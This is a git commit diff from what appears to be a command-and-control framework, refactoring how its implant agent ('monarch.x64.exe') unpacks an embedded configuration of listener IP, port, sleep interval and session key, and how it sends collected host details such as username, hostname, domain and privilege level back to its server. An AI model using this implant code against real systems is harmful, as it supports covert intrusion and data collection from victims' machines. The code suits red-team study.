Refactor profile de/serialization, removing unnecessary overhead caused by TLV format.

2025-08-19 14:34:58 +02:00
parent 00a2eb40bf
commit 72fcb0d610
7 changed files with 56 additions and 130 deletions
--- a/src/agent/core/context.nim
+++ b/src/agent/core/context.nim
@@ -9,32 +9,18 @@ proc deserializeConfiguration(config: string): AgentCtx =

    var agentKeyPair = generateKeyPair() 

-    var ctx = new AgentCtx 
-    ctx.agentId = generateUUID() 
-    ctx.agentPublicKey = agentKeyPair.publicKey
-
-    while unpacker.getPosition() != config.len(): 
-
-        let 
-            configType = cast[ConfigType](unpacker.getUint8())
-            length = int(unpacker.getUint32())
-            data = unpacker.getBytes(length)
-
-        case configType: 
-        of CONFIG_LISTENER_UUID: 
-            ctx.listenerId = Uuid.toString(Bytes.toUint32(data))
-        of CONFIG_LISTENER_IP:
-            ctx.ip = Bytes.toString(data)
-        of CONFIG_LISTENER_PORT: 
-            ctx.port = int(Bytes.toUint32(data))
-        of CONFIG_SLEEP_DELAY:
-            ctx.sleep = int(Bytes.toUint32(data))
-        of CONFIG_PUBLIC_KEY:  
-            let serverPublicKey = Bytes.toString(data).toKey()
-            ctx.sessionKey = deriveSessionKey(agentKeyPair, serverPublicKey)
-        of CONFIG_PROFILE: 
-            ctx.profile = parseString(Bytes.toString(data))
-        else: discard
+    var ctx = AgentCtx(
+        agentId: generateUUID(),
+        listenerId: Uuid.toString(unpacker.getUint32()),
+        ip: unpacker.getDataWithLengthPrefix(),
+        port: int(unpacker.getUint32()),
+        sleep: int(unpacker.getUint32()),
+        sessionKey: deriveSessionKey(agentKeyPair, unpacker.getByteArray(Key)),
+        agentPublicKey: agentKeyPair.publicKey,
+        profile: parseString(unpacker.getDataWithLengthPrefix())
+    ) 
+    
+    wipeKey(agentKeyPair.privateKey)

    echo "[+] Profile configuration deserialized."
    return ctx
@@ -42,34 +28,11 @@ proc deserializeConfiguration(config: string): AgentCtx =
 proc init*(T: type AgentCtx): AgentCtx = 

    try: 
-        # The agent configuration is read at compile time using define/-d statements in nim.cfg
-        # This configuration file can be dynamically generated from the teamserver management interface
-        # Downside to this is obviously that readable strings, such as the listener UUID can be found in the binary
        when not defined(CONFIGURATION):
            raise newException(CatchableError, "Missing agent configuration.")

        return deserializeConfiguration(CONFIGURATION)

-        # Create agent configuration
-        # var agentKeyPair = generateKeyPair() 
-        # let serverPublicKey = decode(ServerPublicKey).toKey() 
-
-        # let ctx = AgentCtx(
-        #     agentId: generateUUID(),
-        #     listenerId: ListenerUuid,
-        #     ip: address, 
-        #     port: ListenerPort, 
-        #     sleep: SleepDelay,
-        #     sessionKey: deriveSessionKey(agentKeyPair, serverPublicKey),   # Perform key exchange to derive AES256 session key for encrypted communication
-        #     agentPublicKey: agentKeyPair.publicKey,
-        #     profile: parseString(decode(ProfileString))
-        # )
-
-        # # Cleanup agent's secret key
-        # wipeKey(agentKeyPair.privateKey)
-
-        # return ctx
-
    except CatchableError as err:
        echo "[-] " & err.msg
        return nil
--- a/src/agent/nim.cfg
+++ b/src/agent/nim.cfg
@@ -1,3 +1,3 @@
 # Agent configuration 
-d:CONFIGURATION=PLACEHOLDERAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPLACEHOLDER
+-d:CONFIGURATION=PLACEHOLDERAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPLACEHOLDER
 -o:"/mnt/c/Users/jakob/Documents/Projects/conquest/bin/monarch.x64.exe"
--- a/src/agent/protocol/registration.nim
+++ b/src/agent/protocol/registration.nim
@@ -228,12 +228,12 @@ proc serializeRegistrationData*(ctx: AgentCtx, data: var AgentRegistrationData):
    # Serialize registration data
    packer 
        .add(data.metadata.listenerId)
-        .addVarLengthMetadata(data.metadata.username)
-        .addVarLengthMetadata(data.metadata.hostname)
-        .addVarLengthMetadata(data.metadata.domain)
-        .addVarLengthMetadata(data.metadata.ip)
-        .addVarLengthMetadata(data.metadata.os)
-        .addVarLengthMetadata(data.metadata.process)
+        .addDataWithLengthPrefix(data.metadata.username)
+        .addDataWithLengthPrefix(data.metadata.hostname)
+        .addDataWithLengthPrefix(data.metadata.domain)
+        .addDataWithLengthPrefix(data.metadata.ip)
+        .addDataWithLengthPrefix(data.metadata.os)
+        .addDataWithLengthPrefix(data.metadata.process)
        .add(data.metadata.pid)
        .add(data.metadata.isElevated)
        .add(data.metadata.sleep)